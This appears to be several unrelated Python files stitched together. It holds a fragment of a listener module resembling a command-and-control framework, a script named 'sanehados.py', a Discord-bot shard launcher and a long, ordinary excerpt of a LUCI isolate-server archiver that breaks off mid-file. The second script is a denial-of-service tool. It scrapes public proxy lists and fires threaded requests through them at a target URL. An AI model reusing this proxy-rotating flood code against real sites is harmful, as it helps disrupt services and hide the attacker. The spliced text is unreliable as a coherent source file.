time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.letters
cookie = helpers.random_string(random.randint(6,16), charset=chars)
return cookie
|
sanehados.py
|
#!/usr/bin/env python3
import requests
import random
import re
import threading
import os
url = 'http://www.icanhazip.com' #TARGET
httpproxies = []
socks4proxies = []
socks5proxies = []
def get_proxies():
proxies = []
res = requests.get('https://free-proxy-list.net').text
p = re.findall('(\d+\.\d+\.\d+\.\d+):(\d+)',res)
for proxy in p:
proxies.append(proxy[0]+':'+proxy[1])
return proxies
def check_proxies(proxies):
s= requests.Session()
for proxy in proxies:
b = False
try:
s.proxies = {"http":proxy,"https":proxy}
res = s.get(url,timeout = 1.5)
if res :
b = True
httpproxies.append(proxy)
except Exception as e:
print("\n Not a http/https proxy")
if b == False:
try:
s.proxies = {"http":"socks5://"+proxy,"https":"socks5://"+proxy}
res = s.get(url,timeout = 1.5)
if res:
b= True
socks4proxies.append(proxy)
except Exception as e:
print("\n Not a socks5 proxy")
if b == False:
try:
s.proxies = {"http":"socks4://"+proxy,"https":"socks4://"+proxy}
res = s.get(url,timeout =1.5)
if res:
socks5proxies.append(proxy)
except Exception as e:
print("\n Not a socks4 proxy")
print(httpproxies)
def attack():
s= requests.Session()
if httpproxies:
hproxy = random.choice(httpproxies)
for i in range(2):
s.proxies = {"http":hproxy,"https":hproxy}
res = s.get(url,timeout = 1.5)
print(res.text)
if socks4proxies:
s4proxy = random.choice(socks4proxies)
for j in range(2):
s.proxies = {"http":"socks4://"+s4proxy,"https":"socks4://"+s4proxy}
res = s.get(url,timeout =1.5)
print(res.text)
if socks5proxies:
s5proxy = random.choice(socks5proxies)
for k in range(2):
s.proxies = {"http":"socks5://"+s5proxy,"https":"socks5://"+s5proxy}
res = s.get(url,timeout = 1.5)
print(res.text)
if __name__ == "__main__":
print("START!")
proxies = get_proxies()
print("Up proxies:")
print(proxies)
print("Party starts in 321..............")
check_proxies(proxies)
for i in range(50):
t = threading.Thread(target=attack)
t.start()
|
aio_launcher.py
|
import asyncio
import math
import os
import shutil
import subprocess
import sys
from multiprocessing import Process, Pipe
import instance
loop = asyncio.get_event_loop()
executable = str(shutil.which('python3.6') or shutil.which('py')).split('/')[-1]
instance_queue = []
instances = []
class PendingInstance:
def __init__(self, i_id, total_shards, shard_ids):
self.id = i_id
self.total_shards = total_shards
self.shard_ids = shard_ids
def launch_next_shard():
if instance_queue:
i = instance_queue.pop(0)
print('Launching instance {}'.format(i.id))
listen, send = Pipe()
p = Process(target=instance.Instance, args=(i.id, i.total_shards, i.shard_ids, send,))
instances.append(p)
p.start()
if listen.recv() == 1:
launch_next_shard()
listen.close()
else:
print('All instances launched!')
def wait(delay: int):
loop.run_until_complete(asyncio.sleep(delay))
if __name__ == '__main__':
shards_per_instance = 1
total_shards = 2
sharded = '--sharded' in sys.argv
if sharded:
print('Sharding enabled. Validating shard count...')
if total_shards >= 40 and total_shards % 16 != 0: # 40 * 2,500 = 100,000 (see: https://github.com/discordapp/discord-api-docs/issues/387)
print('Bad shard count: total_shards must be a multiple of 16')
sys.exit(0)
total_instances = math.ceil(total_shards / shards_per_instance)
print('Using {} instances'.format(total_instances))
wait(5)
for i in range(0, total_instances):
start = i * shards_per_instance
last = min(start + shards_per_instance, total_shards)
ids = list(range(start, last))
print('Appending instance {} to launch queue...'.format(i))
instance_queue.append(PendingInstance(i, total_shards, ids))
else:
instance_queue.append(PendingInstance(0, 1, [0], launch_next_shard))
launch_next_shard()
try:
while True: # Keep the main process up
wait(5)
except KeyboardInterrupt:
pass
|
isolateserver.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Archives a set of files or directories to an Isolate Server."""
from __future__ import print_function
import collections
import errno
import functools
import logging
import optparse
import os
import re
import signal
import stat
import sys
import tarfile
import threading
import time
import zlib
from utils import net
from utils import tools
tools.force_local_third_party()
# third_party/
import colorama
from depot_tools import fix_encoding
from depot_tools import subcommand
import six
from six.moves import queue as Queue
# pylint: disable=ungrouped-imports
import auth
import isolated_format
import isolate_storage
import local_caching
from utils import file_path
from utils import fs
from utils import logging_utils
from utils import net
from utils import on_error
from utils import subprocess42
from utils import threading_utils
__version__ = '0.9.0'
# Version of isolate protocol passed to the server in /handshake request.
ISOLATE_PROTOCOL_VERSION = '1.0'
# Maximum expected delay (in seconds) between successive file fetches or uploads
# in Storage. If it takes longer than that, a deadlock might be happening
# and all stack frames for all threads are dumped to log.
DEADLOCK_TIMEOUT = 5 * 60
# The number of files to check the isolate server per /pre-upload query.
# All files are sorted by likelihood of a change in the file content
# (currently file size is used to estimate this: larger the file -> larger the
# possibility it has changed). Then first ITEMS_PER_CONTAINS_QUERIES[0] files
# are taken and send to '/pre-upload', then next ITEMS_PER_CONTAINS_QUERIES[1],
# and so on. Numbers here is a trade-off; the more per request, the lower the
# effect of HTTP round trip latency and TCP-level chattiness. On the other hand,
# larger values cause longer lookups, increasing the initial latency to start
# uploading, which is especially an issue for large files. This value is
# optimized for the "few thousands files to look up with minimal number of large
# files missing" case.
ITEMS_PER_CONTAINS_QUERIES = (20, 20, 50, 50, 50, 100)
# A list of already compressed extension types that should not receive any
# compression before being uploaded.
ALREADY_COMPRESSED_TYPES = [
'7z',
'avi',
'cur',
'gif',
'h264',
'jar',
'jpeg',
'jpg',
'mp4',
'pdf',
'png',
'wav',
'zip',
]
# The delay (in seconds) to wait between logging statements when retrieving the
# required files. This is intended to let the user know that the program is
# still running.
DELAY_BETWEEN_UPDATES_IN_SECS = 30
DEFAULT_DENYLIST = (
# Temporary vim or python files.
r'^.+\.(?:pyc|swp)$',
# .git or .svn directory.
r'^(?:.+' + re.escape(os.path.sep) + r'|)\.(?:git|svn)$',
)
class Error(Exception):
"""Generic runtime error."""
pass
class Aborted(Error):
"""Operation aborted."""
pass
class AlreadyExists(Error):
"""File already exists."""
def file_read(path, chunk_size=isolated_format.DISK_FILE_CHUNK, offset=0):
"""Yields file content in chunks of |chunk_size| starting from |offset|."""
with fs.open(path, 'rb') as f:
if offset:
f.seek(offset)
while True:
data = f.read(chunk_size)
if not data:
break
yield data
def fileobj_path(fileobj):
"""Return file system path for file like object or None.
The returned path is guaranteed to exist and can be passed to file system
operations like copy.
"""
name = getattr(fileobj, 'name', None)
if name is None:
return None
# If the file like object was created using something like open("test.txt")
# name will end up being a str (such as a function outside our control, like
# the standard library). We want all our paths to be unicode objects, so we
# decode it.
if not isinstance(name, six.text_type):
# We incorrectly assume that UTF-8 is used everywhere.
name = name.decode('utf-8')
# fs.exists requires an absolute path, otherwise it will fail with an
# assertion error.
if not os.path.isabs(name):
return None
if fs.exists(name):
return name
return None
# TODO(tansell): Replace fileobj_copy with shutil.copyfileobj once proper file
# wrappers have been created.
def fileobj_copy(
dstfileobj, srcfileobj, size=-1,
chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Copy data from srcfileobj to dstfileobj.
Providing size means exactly that amount of data will be copied (if there
isn't enough data, an IOError exception is thrown). Otherwise all data until
the EOF marker will be copied.
"""
if size == -1 and hasattr(srcfileobj, 'tell'):
if srcfileobj.tell() != 0:
raise IOError('partial file but not using size')
written = 0
while written != size:
readsize = chunk_size
if size > 0:
readsize = min(readsize, size-written)
data = srcfileobj.read(readsize)
if not data:
if size == -1:
break
raise IOError('partial file, got %s, wanted %s' % (written, size))
dstfileobj.write(data)
written += len(data)
def putfile(srcfileobj, dstpath, file_mode=None, size=-1, use_symlink=False):
"""Put srcfileobj at the given dstpath with given mode.
The function aims to do this as efficiently as possible while still allowing
any possible file like object be given.
Creating a tree of hardlinks has a few drawbacks:
- tmpfs cannot be used for the scratch space. The tree has to be on the same
partition as the cache.
- involves a write to the inode, which advances ctime, cause a metadata
writeback (causing disk seeking).
- cache ctime cannot be used to detect modifications / corruption.
- Some file systems (NTFS) have a 64k limit on the number of hardlink per
partition. This is why the function automatically fallbacks to copying the
file content.
- /proc/sys/fs/protected_hardlinks causes an additional check to ensure the
same owner is for all hardlinks.
- Anecdotal report that ext2 is known to be potentially faulty on high rate
of hardlink creation.
Creating a tree of symlinks has a few drawbacks:
- Tasks running the equivalent of os.path.realpath() will get the naked path
and may fail.
- Windows:
- Symlinks are reparse points:
https://msdn.microsoft.com/library/windows/desktop/aa365460.aspx
https://msdn.microsoft.com/library/windows/desktop/aa363940.aspx
- Symbolic links are Win32 paths, not NT paths.
https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html
- Symbolic links are supported on Windows 7 and later only.
- SeCreateSymbolicLinkPrivilege is needed, which is not present by
default.
- SeCreateSymbolicLinkPrivilege is *stripped off* by UAC when a restricted
RID is present in the token;
https://msdn.microsoft.com/en-us/library/bb530410.aspx
"""
srcpath = fileobj_path(srcfileobj)
if srcpath and size == -1:
readonly = file_mode is None or (
file_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))
if readonly:
# If the file is read only we can link the file
if use_symlink:
link_mode = file_path.SYMLINK_WITH_FALLBACK
else:
link_mode = file_path.HARDLINK_WITH_FALLBACK
else:
# If not read only, we must copy the file
link_mode = file_path.COPY
file_path.link_file(dstpath, srcpath, link_mode)
assert fs.exists(dstpath)
else:
# Need to write out the file
with fs.open(dstpath, 'wb') as dstfileobj:
fileobj_copy(dstfileobj, srcfileobj, size)
if sys.platform == 'win32' and file_mode and file_mode & stat.S_IWRITE:
# On windows, mode other than removing stat.S_IWRITE is ignored. Returns
# early to skip slow/unnecessary chmod call.
return
# file_mode of 0 is actually valid, so need explicit check.
if file_mode is not None:
fs.chmod(dstpath, file_mode)
def zip_compress(content_generator, level=7):
"""Reads chunks from |content_generator| and yields zip compressed chunks."""
compressor = zlib.compressobj(level)
for chunk in content_generator:
compressed = compressor.compress(chunk)
if compressed:
yield compressed
tail = compressor.flush(zlib.Z_FINISH)
if tail:
yield tail
def zip_decompress(
content_generator, chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Reads zipped data from |content_generator| and yields decompressed data.
Decompresses data in small chunks (no larger than |chunk_size|) so that
zip bomb file doesn't cause zlib to preallocate huge amount of memory.
Raises IOError if data is corrupted or incomplete.
"""
decompressor = zlib.decompressobj()
compressed_size = 0
try:
for chunk in content_generator:
compressed_size += len(chunk)
data = decompressor.decompress(chunk, chunk_size)
if data:
yield data
while decompressor.unconsumed_tail:
data = decompressor.decompress(decompressor.unconsumed_tail, chunk_size)
if data:
yield data
tail = decompressor.flush()
if tail:
yield tail
except zlib.error as e:
raise IOError(
'Corrupted zip stream (read %d bytes) - %s' % (compressed_size, e))
# Ensure all data was read and decompressed.
if decompressor.unused_data or decompressor.unconsumed_tail:
raise IOError('Not all data was decompressed')
def _get_zip_compression_level(filename):
"""Given a filename calculates the ideal zip compression level to use."""
file_ext = os.path.splitext(filename)[1].lower()
# TODO(csharp): Profile to find what compression level works best.
return 0 if file_ext in ALREADY_COMPRESSED_TYPES else 7
def create_directories(base_directory, files):
"""Creates the directory structure needed by the given list of files."""
logging.debug('create_directories(%s, %d)', base_directory, len(files))
# Creates the tree of directories to create.
directories = set(os.path.dirname(f) for f in files)
for item in list(directories):
while item:
directories.add(item)
item = os.path.dirname(item)
for d in sorted(directories):
if d:
abs_d = os.path.join(base_directory, d)
if not fs.isdir(abs_d):
fs.mkdir(abs_d)
def _create_symlinks(base_directory, files):
"""Creates any symlinks needed by the given set of files."""
for filepath, properties in files:
if 'l' not in properties:
continue
if sys.platform == 'win32':
# TODO(maruel): Create symlink via the win32 api.
logging.warning('Ignoring symlink %s', filepath)
continue
outfile = os.path.join(base_directory, filepath)
try:
os.symlink(properties['l'], outfile) # pylint: disable=E1101
except OSError as e:
if e.errno == errno.EEXIST:
raise AlreadyExists('File %s already exists.' % outfile)
raise
class _ThreadFile(object):
"""Multithreaded fake file. Used by TarBundle."""
def __init__(self):
self._data = threading_utils.TaskChannel()
self._offset = 0
def __iter__(self):
return self._data
def tell(self):
return self._offset
def write(self, b):
self._data.send_result(b)
self._offset += len(b)
def close(self):
self._data.send_done()
class FileItem(isolate_storage.Item):
"""A file to push to Storage.
Its digest and size may be provided in advance, if known. Otherwise they will
be derived from the file content.
"""
def __init__(self, path, algo, digest=None, size=None, high_priority=False):
super(FileItem, self).__init__(
digest,
size if size is not None else fs.stat(path).st_size,
high_priority,
compression_level=_get_zip_compression_level(path))
self._path = path
self._algo = algo
self._meta = None
@property
def path(self):
return self._path
@property
def algo(self):
return self._algo
@property
def digest(self):
if not self._digest:
self._digest = isolated_format.hash_file(self._path, self._algo)
return self._digest
@property
def meta(self):
if not self._meta:
# TODO(maruel): Inline.
self._meta = isolated_format.file_to_metadata(self.path, False)
# We need to hash right away.
self._meta['h'] = self.digest
return self._meta
def content(self):
return file_read(self.path)
class TarBundle(isolate_storage.Item):
"""Tarfile to push to Storage.
Its digest is the digest of all the files it contains. It is generated on the
fly.
"""
def __init__(self, root, algo):
# 2 trailing 512 bytes headers.
super(TarBundle, self).__init__(size=1024)
self._items = []
self._meta = None
self._algo = algo
self._root_len = len(root) + 1
# Same value as for Go.
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/tar_archiver.go
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/upload_tracker.go
self._archive_max_size = int(10e6)
@property
def digest(self):
if not self._digest:
self._prepare()
return self._digest
@property
def size(self):
if self._size is None:
self._prepare()
return self._size
def try_add(self, item):
"""Try to add this file to the bundle.
It is extremely naive but this should be just enough for
https://crbug.com/825418.
Future improvements should be in the Go code, and the Swarming bot should be
migrated to use the Go code instead.
"""
if not item.size:
return False
# pylint: disable=unreachable
rounded = (item.size + 512) & ~511
if rounded + self._size > self._archive_max_size:
return False
# https://crbug.com/825418
return False
self._size += rounded
self._items.append(item)
return True
def yield_item_path_meta(self):
"""Returns a tuple(Item, filepath, meta_dict).
If the bundle contains less than 5 items, the items are yielded.
"""
if len(self._items) < 5:
# The tarball is too small, yield individual items, if any.
for item in self._items:
yield item, item.path[self._root_len:], item.meta
else:
# This ensures self._meta is set.
p = self.digest + '.tar'
# Yield itself as a tarball.
yield self, p, self._meta
def content(self):
"""Generates the tarfile content on the fly."""
obj = _ThreadFile()
def _tar_thread():
try:
t = tarfile.open(
fileobj=obj, mode='w', format=tarfile.PAX_FORMAT, encoding='utf-8')
for item in self._items:
logging.info(' tarring %s', item.path)
t.add(item.path)
t.close()
except Exception:
logging.exception('Internal failure')
finally:
obj.close()
t = threading.Thread(target=_tar_thread)
t.start()
try:
for data in obj:
yield data
finally:
t.join()
def _prepare(self):
h = self._algo()
total = 0
for chunk in self.content():
h.update(chunk)
total += len(chunk)
# pylint: disable=attribute-defined-outside-init
# This is not true, they are defined in Item.__init__().
self._digest = h.hexdigest()
self._size = total
self._meta = {
'h': self.digest,
's': self.size,
't': u'tar',
}
class BufferItem(isolate_storage.Item):
"""A byte buffer to push to Storage."""
def __init__(self, buf, algo, high_priority=False):
super(BufferItem, self).__init__(
digest=algo(buf).hexdigest(),
size=len(buf),
high_priority=high_priority)
self._buffer = buf
def content(self):
return [self._buffer]
class Storage(object):
"""Efficiently downloads or uploads large set of files via StorageApi.
Implements compression support, parallel 'contains' checks, parallel uploads
and more.
Works only within single namespace (and thus hashing algorithm and compression
scheme are fixed).
Spawns multiple internal threads. Thread safe, but not fork safe. Modifies
signal handlers table to handle Ctrl+C.
"""
def __init__(self, storage_api):
self._storage_api = storage_api
self._cpu_thread_pool = None
self._net_thread_pool = None
self._aborted = False
self._prev_sig_handlers = {}
@property
def server_ref(self):
"""Shortcut to get the server_ref from storage_api.
This can be used to get the underlying hash_algo.
"""
return self._storage_api.server_ref
@property
def cpu_thread_pool(self):
"""ThreadPool for CPU-bound tasks like zipping."""
if self._cpu_thread_pool is None:
threads = max(threading_utils.num_processors(), 2)
max_size = long(2)**32 if sys.version_info.major == 2 else 2**32
if sys.maxsize <= max_size:
# On 32 bits userland, do not try to use more than 16 threads.
threads = min(threads, 16)
self._cpu_thread_pool = threading_utils.ThreadPool(2, threads, 0, 'zip')
return self._cpu_thread_pool
@property
def net_thread_pool(self):
"""AutoRetryThreadPool for IO-bound tasks, retries IOError."""
if self._net_thread_pool is None:
self._net_thread_pool = threading_utils.IOAutoRetryThreadPool()
return self._net_thread_pool
def close(self):
"""Waits for all pending tasks to finish."""
logging.info('Waiting for all threads to die...')
if self._cpu_thread_pool:
self._cpu_thread_pool.join()
self._cpu_thread_pool.close()
self._cpu_thread_pool = None
if self._net_thread_pool:
self._net_thread_pool.join()
self._net_thread_pool.close()
self._net_thread_pool = None
logging.info('Done.')
def abort(self):
"""Cancels any pending or future operations."""
# This is not strictly theadsafe, but in the worst case the logging message
# will be printed twice. Not a big deal. In other places it is assumed that
# unprotected reads and writes to _aborted are serializable (it is true
# for python) and thus no locking is used.
if not self._aborted:
logging.warning('Aborting... It can take a while.')
self._aborted = True
def __enter__(self):
"""Context manager interface."""
assert not self._prev_sig_handlers, self._prev_sig_handlers
for s in (signal.SIGINT, signal.SIGTERM):
self._prev_sig_handlers[s] = signal.signal(s, lambda *_args: self.abort())
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Context manager interface."""
self.close()
while self._prev_sig_handlers:
s, h = self._prev_sig_handlers.popitem()
signal.signal(s, h)
return False
def upload_items(self, items, verify_push=False):
"""Uploads a generator of Item to the isolate server.
It figures out what items are missing from the server and uploads only them.
It uses 3 threads internally:
- One to create batches based on a timeout
- One to dispatch the /contains RPC and field the missing entries
- One to field the /push RPC
The main threads enumerates 'items' and pushes to the first thread. Then it
join() all the threads, waiting for them to complete.
(enumerate items of Item, this can be slow as disk is traversed)
|
v
_create_items_batches_thread Thread #1
(generates list(Item), every 3s or 20~100 items)
|
v
_do_lookups_thread Thread #2
| |
v v
(missing) (was on server)
|
v
_handle_missing_thread Thread #3
|
v
(upload Item, append to uploaded)
Arguments:
items: list of isolate_storage.Item instances that represents data to
upload.
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
List of items that were uploaded. All other items are already there.
Raises:
The first exception being raised in the worker threads.
"""
incoming = Queue.Queue()
batches_to_lookup = Queue.Queue()
missing = Queue.Queue()
uploaded = []
exc_channel = threading_utils.TaskChannel()
def _create_items_batches_thread():
"""Creates batches for /contains RPC lookup from individual items.
Input: incoming
Output: batches_to_lookup
"""
try:
batch_size_index = 0
batch_size = ITEMS_PER_CONTAINS_QUERIES[batch_size_index]
batch = []
while not self._aborted:
try:
item = incoming.get(True, timeout=3)
if item:
batch.append(item)
except Queue.Empty:
item = False
if len(batch) == batch_size or (not item and batch):
if len(batch) == batch_size:
batch_size_index += 1
batch_size = ITEMS_PER_CONTAINS_QUERIES[
min(batch_size_index, len(ITEMS_PER_CONTAINS_QUERIES)-1)]
batches_to_lookup.put(batch)
batch = []
if item is None:
break
except Exception:
exc_channel.send_exception()
finally:
# Unblock the next pipeline.
batches_to_lookup.put(None)
def _do_lookups_thread():
"""Enqueues all the /contains RPCs and emits the missing items.
Input: batches_to_lookup
Output: missing, to_upload
"""
try:
channel = threading_utils.TaskChannel()
def _contains(b):
if self._aborted:
raise Aborted()
return self._storage_api.contains(b)
pending_contains = 0
while not self._aborted:
batch = batches_to_lookup.get()
if batch is None:
break
self.net_thread_pool.add_task_with_channel(
channel, threading_utils.PRIORITY_HIGH, _contains, batch)
pending_contains += 1
while pending_contains and not self._aborted:
try:
v = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
pending_contains -= 1
for missing_item, push_state in v.items():
missing.put((missing_item, push_state))
while pending_contains and not self._aborted:
for missing_item, push_state in channel.next().items():
missing.put((missing_item, push_state))
pending_contains -= 1
except Exception:
exc_channel.send_exception()
finally:
# Unblock the next pipeline.
missing.put((None, None))
def _handle_missing_thread():
"""Sends the missing items to the uploader.
Input: missing
Output: uploaded
"""
try:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
channel = threading_utils.TaskChannel()
pending_upload = 0
while not self._aborted:
try:
missing_item, push_state = missing.get(True, timeout=5)
if missing_item is None:
break
self._async_push(channel, missing_item, push_state, verify_push)
pending_upload += 1
except Queue.Empty:
pass
detector.ping()
while not self._aborted and pending_upload:
try:
item = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
uploaded.append(item)
pending_upload -= 1
logging.debug('Uploaded %d; %d pending: %s (%d)', len(uploaded),
pending_upload, item.digest, item.size)
while not self._aborted and pending_upload:
item = channel.next()
uploaded.append(item)
pending_upload -= 1
logging.debug(
'Uploaded %d; %d pending: %s (%d)',
len(uploaded), pending_upload, item.digest, item.size)
except Exception:
exc_channel.send_exception()
threads = [
threading.Thread(target=_create_items_batches_thread),
threading.Thread(target=_do_lookups_thread),
threading.Thread(target=_handle_missing_thread),
]
for t in threads:
t.start()
try:
# For each digest keep only first isolate_storage.Item that matches it.
# All other items are just indistinguishable copies from the point of view
# of isolate server (it doesn't care about paths at all, only content and
# digests).
seen = {}
try:
# TODO(maruel): Reorder the items as a priority queue, with larger items
# being processed first. This is, before hashing the data.
# This must be done in the primary thread since items can be a
# generator.
for item in items:
if seen.setdefault(item.digest, item) is item:
incoming.put(item)
finally:
incoming.put(None)
finally:
for t in threads:
t.join()
exc_channel.send_done()
for _ in exc_channel:
# If there is no exception, this loop does nothing. Otherwise, it raises
# the first exception put onto |exc_channel|.
pass
logging.info('All %s files are uploaded', len(uploaded))
if seen:
_print_upload_stats(seen.values(), uploaded)
return uploaded
def _async_push(self, channel, item, push_state, verify_push=False):
"""Starts asynchronous push to the server in a parallel thread.
Can be used only after |item| was checked for presence on a server with a
/contains RPC.
Arguments:
channel: TaskChannel that receives back |item| when upload ends.
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
None, but |channel| later receives back |item| when upload ends.
"""
# Thread pool task priority.
priority = (
threading_utils.PRIORITY_HIGH if item.high_priority
else threading_utils.PRIORITY_MED)
def _push(content):
"""Pushes an isolate_storage.Item and returns it to |channel|."""
if self._aborted:
raise Aborted()
self._storage_api.push(item, push_state, content)
if verify_push:
try:
self._fetch(
item.digest,
item.size,
# this consumes all elements from given generator.
lambda gen: collections.deque(gen, maxlen=0))
except Exception:
# reset push_state if failed to verify.
push_state.finalized = False
push_state.uploaded = False
raise
return item
# If zipping is not required, just start a push task. Don't pass 'content'
# so that it can create a new generator when it retries on failures.
if not self.server_ref.is_with_compression:
self.net_thread_pool.add_task_with_channel(channel, priority, _push, None)
return
# If zipping is enabled, zip in a separate thread.
def zip_and_push():
# TODO(vadimsh): Implement streaming uploads. Before it's done, assemble
# content right here. It will block until all file is zipped.
try:
if self._aborted:
raise Aborted()
stream = zip_compress(item.content(), item.compression_level)
# In Python3, zlib.compress returns a byte object instead of str.
data = six.b('').join(stream)
except Exception as exc:
logging.error('Failed to zip \'%s\': %s', item, exc)
channel.send_exception()
return
# Pass '[data]' explicitly because the compressed data is not same as the
# one provided by 'item'. Since '[data]' is a list, it can safely be
# reused during retries.
self.net_thread_pool.add_task_with_channel(
channel, priority, _push, [data])
self.cpu_thread_pool.add_task(priority, zip_and_push)
def push(self, item, push_state):
"""Synchronously pushes a single item to the server.
If you need to push many items at once, consider using 'upload_items' or
'_async_push' with instance of TaskChannel.
Arguments:
item: item to upload as instance of isolate_storage.Item class.
push_state: push state returned by storage_api.contains(). It contains
storage specific information describing how to upload the item (for
example in case of cloud storage, it is signed upload URLs).
Returns:
Pushed item (same object as |item|).
"""
channel = threading_utils.TaskChannel()
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT):
self._async_push(channel, item, push_state)
pushed = channel.next()
assert pushed is item
return item
def _fetch(self, digest, size, sink):
try:
# Prepare reading pipeline.
stream = self._storage_api.fetch(digest, size, 0)
if self.server_ref.is_with_compression:
stream = zip_decompress(stream, isolated_format.DISK_FILE_CHUNK)
# Run |stream| through verifier that will assert its size.
verifier = FetchStreamVerifier(stream, self.server_ref.hash_algo, digest,
size)
# Verified stream goes to |sink|.
sink(verifier.run())
except Exception:
logging.exception('Failed to fetch %s', digest)
raise
def async_fetch(self, channel, priority, digest, size, sink):
"""Starts asynchronous fetch from the server in a parallel thread.
Arguments:
channel: TaskChannel that receives back |digest| when download ends.
priority: thread pool task priority for the fetch.
digest: hex digest of an item to download.
size: expected size of the item (after decompression).
sink: function that will be called as sink(generator).
"""
def fetch():
self._fetch(digest, size, sink)
return digest
# Don't bother with zip_thread_pool for decompression. Decompression is
# really fast and most probably IO bound anyway.
self.net_thread_pool.add_task_with_channel(channel, priority, fetch)
class FetchQueue(object):
"""Fetches items from Storage and places them into ContentAddressedCache.
It manages multiple concurrent fetch operations. Acts as a bridge between
Storage and ContentAddressedCache so that Storage and ContentAddressedCache
don't depend on each other at all.
"""
def __init__(self, storage, cache):
self.storage = storage
self.cache = cache
self._channel = threading_utils.TaskChannel()
self._pending = set()
self._accessed = set()
self._fetched = set(cache)
# Pending digests that the caller waits for, see wait_on()/wait().
self._waiting_on = set()
# Already fetched digests the caller waits for which are not yet returned by
# wait().
self._waiting_on_ready = set()
def add(
self,
digest,
size=local_caching.UNKNOWN_FILE_SIZE,
priority=threading_utils.PRIORITY_MED):
"""Starts asynchronous fetch of item |digest|."""
# Fetching it now?
if digest in self._pending:
return
# Mark this file as in use, verify_all_cached will later ensure it is still
# in cache.
self._accessed.add(digest)
# Already fetched? Notify cache to update item's LRU position.
if digest in self._fetched:
# 'touch' returns True if item is in cache and not corrupted.
if self.cache.touch(digest, size):
return
logging.error('%s is corrupted', digest)
self._fetched.remove(digest)
# TODO(maruel): It should look at the free disk space, the current cache
# size and the size of the new item on every new item:
# - Trim the cache as more entries are listed when free disk space is low,
# otherwise if the amount of data downloaded during the run > free disk
# space, it'll crash.
# - Make sure there's enough free disk space to fit all dependencies of
# this run! If not, abort early.
# Start fetching.
self._pending.add(digest)
self.storage.async_fetch(
self._channel, priority, digest, size,
functools.partial(self.cache.write, digest))
def wait_on(self, digest):
"""Updates digests to be waited on by 'wait'."""
# Calculate once the already fetched items. These will be retrieved first.
if digest in self._fetched:
self._waiting_on_ready.add(digest)
else:
self._waiting_on.add(digest)
def wait(self):
"""Waits until any of waited-on items is retrieved.
Once this happens, it is remove from the waited-on set and returned.
This function is called in two waves. The first wave it is done for HIGH
priority items, the isolated files themselves. The second wave it is called
for all the files.
If the waited-on set is empty, raises RuntimeError.
"""
# Flush any already fetched items.
if self._waiting_on_ready:
return self._waiting_on_ready.pop()
assert self._waiting_on, 'Needs items to wait on'
# Wait for one waited-on item to be fetched.
while self._pending:
digest = self._channel.next()
self._pending.remove(digest)
self._fetched.add(digest)
if digest in self._waiting_on:
self._waiting_on.remove(digest)
return digest
# Should never reach this point due to assert above.
raise RuntimeError('Impossible state')
@property
def wait_queue_empty(self):
"""Returns True if there is no digest left for wait() to return."""
return not self._waiting_on and not self._waiting_on_ready
def inject_local_file(self, path, algo):
"""Adds local file to the cache as if it was fetched from storage."""
with fs.open(path, 'rb') as f:
data = f.read()
digest = algo(data).hexdigest()
self.cache.write(digest, [data])
self._fetched.add(digest)
return digest
@property
def pending_count(self):
"""Returns number of items to be fetched."""
return len(self._pending)
def verify_all_cached(self):
"""True if all accessed items are in cache."""
# Not thread safe, but called after all work is done.
return self._accessed.issubset(self.cache)
class FetchStreamVerifier(object):
"""Verifies that fetched file is valid before passing it to the
ContentAddressedCache.
"""
def __init__(self, stream, hasher, expected_digest, expected_size):
"""Initializes the verifier.
Arguments:
* stream: an iterable yielding chunks of content
* hasher: an object from hashlib that supports update() and hexdigest()
(eg, hashlib.sha1).
* expected_digest: if the entire stream is piped through hasher and then
summarized via hexdigest(), this should be the result. That is, it
should be a hex string like 'abc123'.
* expected_size: either the expected size of the stream, or
local_caching.UNKNOWN_FILE_SIZE.
"""
assert stream is not None
self.stream = stream
self.expected_digest = expected_digest
self.expected_size = expected_size
self.current_size = 0
self.rolling_hash = hasher()
def run(self):
"""Generator that yields same items as |stream|.
Verifies |stream| is complete before yielding a last chunk to consumer.
Also wraps IOError produced by consumer into MappingError exceptions since
otherwise Storage will retry fetch on unrelated local cache errors.
"""
# Read one chunk ahead, keep it in |stored|.
# That way a complete stream can be verified before pushing last chunk
# to consumer.
stored = None
for chunk in self.stream:
assert chunk is not None
if stored is not None:
self._inspect_chunk(stored, is_last=False)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
stored = chunk
if stored is not None:
self._inspect_chunk(stored, is_last=True)
try:
yield stored
except IOError as exc:
raise isolated_format.MappingError(
'Failed to store an item in cache: %s' % exc)
def _inspect_chunk(self, chunk, is_last):
"""Called for each fetched chunk before passing it to consumer."""
self.current_size += len(chunk)
self.rolling_hash.update(chunk)
if not is_last:
return
if ((self.expected_size != local_caching.UNKNOWN_FILE_SIZE) and
(self.expected_size != self.current_size)):
msg = 'Incorrect file size: want %d, got %d' % (
self.expected_size, self.current_size)
raise IOError(msg)
actual_digest = self.rolling_hash.hexdigest()
if self.expected_digest != actual_digest:
msg = 'Incorrect digest: want %s, got %s' % (
self.expected_digest, actual_digest)
raise IOError(msg)
class IsolatedBundle(object):
"""Fetched and parsed .isolated file with all dependencies."""
